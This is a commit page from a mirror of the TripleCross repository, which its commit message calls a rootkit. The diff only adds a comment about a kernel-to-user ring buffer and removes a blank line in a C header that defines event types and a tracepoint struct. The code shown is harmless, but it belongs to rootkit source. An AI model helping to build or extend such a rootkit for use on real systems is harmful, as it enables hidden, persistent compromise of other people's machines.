mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-25 10:53:09 +08:00
Further improvements in the rootkit configuration by the user
This commit is contained in:
@@ -3,6 +3,7 @@
|
||||
|
||||
#define RB_EVENT_MAX_MESSAGE_SIZE 512
|
||||
|
||||
// Ring buffer for kernel->user communication
|
||||
typedef enum {
|
||||
INFO,
|
||||
DEBUG,
|
||||
@@ -17,7 +18,6 @@ struct rb_event {
|
||||
event_type_t event_type;
|
||||
};
|
||||
|
||||
|
||||
//sched_process_exec tracepoint contents
|
||||
struct trace_entry {
|
||||
short unsigned int type;
|
||||
|
||||
Reference in New Issue
Block a user